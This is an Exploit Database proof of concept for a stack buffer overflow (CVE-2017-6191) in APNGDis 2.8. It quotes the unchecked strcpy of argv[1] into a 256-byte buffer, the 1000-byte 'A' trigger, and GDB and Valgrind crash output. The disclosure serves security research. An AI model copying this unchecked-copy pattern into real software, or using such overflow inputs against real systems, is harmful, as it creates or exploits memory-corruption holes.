APNGDis 2.8 – ‘filename’ Stack Buffer Overflow (PoC)

• Exploit Database
• 15 阅读

• 作者： Alwin Peppels
  日期： 2017-03-14
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/41670/

• # Exploit Title: APNGDis filename Buffer Overflow
  # Date: 14-03-2017
  # Exploit Author: Alwin Peppels
  # Vendor Homepage: http://apngdis.sourceforge.net/
  # Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
  # Version: 2.8
  # Tested on: Linux Debian / Windows 7
  # CVE : CVE-2017-6191
  
  Additional analysis:
  https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow
  
  Textbook buffer overflow; a fixed size buffer gets allocated with
  szPath[256], and the first command line argument is stored without
  validation.
  
  
  int main(int argc, char** argv)
  {
  	unsigned int i, j;
  	char * szInput;
  	char * szOutPrefix;
  	char szPath[256];
  	char szOut[256];
  	std::vector frames;
  	printf("\nAPNG Disassembler 2.8\n\n");
  
  	if (argc > 1)
  		szInput = argv[1];
  	else
  	{
  		printf("Usage: apngdis anim.png [name]\n");
  		return 1;
  	}
  	strcpy(szPath, szInput);
  }
  
  
  
  
  With 'A' * 1000 as argv[1] :
  
  
  GDB:
  
  Program received signal SIGSEGV, Segmentation fault.
  strlen () at ../sysdeps/x86_64/strlen.S:106
  106 ../sysdeps/x86_64/strlen.S: No such file or directory.
  (gdb) i r
  rax0x4141414141414141 4702111234474983745
  rbx0x7ffff70ea600 140737338320384
  rcx0x141321
  rdx0x00
  rsi0x7fffffffca40 140737488341568
  rdi0x4141414141414141 4702111234474983745
  rbp0x7fffffffceb0 0x7fffffffceb0
  rsp0x7fffffffc948 0x7fffffffc948
  r8 0x4141414141414141 4702111234474983745
  r9 0x99
  r100x73 115
  r110x7fffffffce78 140737488342648
  r120x555555558c9f 93824992251039
  r130x7fffffffcec8 140737488342728
  r140x00
  r150xffffffffffffffff -1
  rip0x7ffff6dd1486 0x7ffff6dd1486 <strlen+38>
  eflags 0x10297[ CF PF AF SF IF RF ]
  
  
  Valgrind:
  
  ==10685== Invalid read of size 1
  ==10685==at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
  ==10685==by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
  ==10685==by 0x5B711F8: printf (printf.c:33)
  ==10685==by 0x109F05: load_apng(char*, std::vector<APNGFrame,
  std::allocator<APNGFrame> >&) (apngdis.cpp:200)
  ==10685==by 0x10B24E: main (apngdis.cpp:498)
  ==10685==Address 0x4141414141414141 is not stack'd, malloc'd or
  (recently) free'd
  ==10685==
  ==10685==
  ==10685== Process terminating with default action of signal 11 (SIGSEGV)
  ==10685==General Protection Fault
  ==10685==at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
  ==10685==by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
  ==10685==by 0x5B711F8: printf (printf.c:33)
  ==10685==by 0x109F05: load_apng(char*, std::vector<APNGFrame,
  std::allocator<APNGFrame> >&) (apngdis.cpp:200)
  ==10685==by 0x10B24E: main (apngdis.cpp:498)
  Reading '==10685==
  ==10685== HEAP SUMMARY:
  ==10685== in use at exit: 0 bytes in 0 blocks
  ==10685== total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
  ==10685==
  ==10685== All heap blocks were freed -- no leaks are possible